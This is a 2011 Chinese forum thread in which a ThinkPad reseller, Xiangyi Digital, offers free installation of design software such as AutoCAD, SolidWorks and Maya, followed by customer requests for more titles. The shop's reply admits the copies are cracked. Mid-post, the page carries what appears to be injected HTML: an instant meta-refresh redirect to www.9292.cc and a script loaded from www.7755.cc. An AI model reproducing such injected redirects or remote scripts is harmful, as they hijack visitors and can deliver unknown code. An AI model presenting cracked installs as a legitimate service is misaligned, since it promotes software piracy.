开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

上海翔意开始提供安装专业设计软件的服务,神马sw、zbrush等

W系列受到越来越多设计类行业用户的喜欢,上海翔意W系列的销量也越来越好。为了更好的服务于设计类行业用户,上海翔意开始提供以下设计类软件的免费安装服务。

软件名 软件版本(x86为32位,x64为64位版本)
AutoCAD 2007(x86),2009(x86,x64),2010(x86,x64)
SolidWorks 2010sp0(x86,x64),2011sp0(x86,x64)
3ds max 2012(x86,x64)
maya 2012(x86,x64)
poser 2010(x86,x64)
lightwave v10(x86,x64)
softimage2012(x86,x64)
cinema 4d R12(x86)
Eon Vue v9(x86)

如果有更多版本和更多专业软件需求,欢迎补充。

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

icemanqi 发表于 2011-5-25 10:20
请问CAD2010是正版?我拷去

都是未经修改的版本,然后破解运行的。另外,在上海呢。
建议增加PROE CATIA UG
光为专业人士服务了!也不关心下我们小白,强烈建议开展WOW预装业务,最好还有极品13的安装
simo 发表于 2011-5-25 11:09
光为专业人士服务了!也不关心下我们小白,强烈建议开展WOW预装业务,最好还有极品13的安装 ...

游戏软件已经列入计划。
babeltree 发表于 2011-5-25 10:44
建议增加PROE CATIA UG

谢谢。这几个还是有必要的。
ibrave 发表于 2011-5-25 12:12
游戏软件已经列入计划。

嘿嘿,俺喜欢
我想要个qq……
有勇敢在的上海店,服务真是越来越到位,越来越给力了!

扭捏了  发表于 2011-5-25 15:53
这个,一定要表扬一下勇敢啊

扭捏了  发表于 2011-5-25 16:06
翔意的服务越来越好了,软件安装服务确实很贴心
.

我理解的意思是,北京早就有软件预装的服务了?

那可太好了。

不知道有没有软件的备份?假如系统挂了,还要返回翔意重装这些软件吗?

.
klenow 发表于 2011-5-25 21:26
.

具体提供的软件列表可以咨询各分店,这个属于各店的个性化服务。

如果有各种软件的安装需求,建议一站式安装,然后做一个备份
建议加Microsoft Visual Studio 每次重装完系统之后都要装这个,装又久,烦了。。。。
被照X光的鱼 发表于 2011-5-25 22:08
建议加Microsoft Visual Studio 每次重装完系统之后都要装这个,装又久,烦了。。。。 ...

这个也可以有。收到,谢谢。
咦 求问有没有lightroom
wherever 发表于 2011-5-31 15:16
咦 求问有没有lightroom

这个准备有
ibrave 发表于 2011-5-31 15:51
这个准备有

矮油 高级的!!这个最喜欢了 批量作图软件呢
勇敢  CAD有三个专业版本  机械  电气  建筑
这种通用版本其实用的不多的  只是适合初学新手
白夜 发表于 2011-6-1 08:24
勇敢  CAD有三个专业版本  机械  电气  建筑
这种通用版本其实用的不多的  只是适合初学新手 ...

明白了,谢谢提醒。
没有ADOBE的软件呀?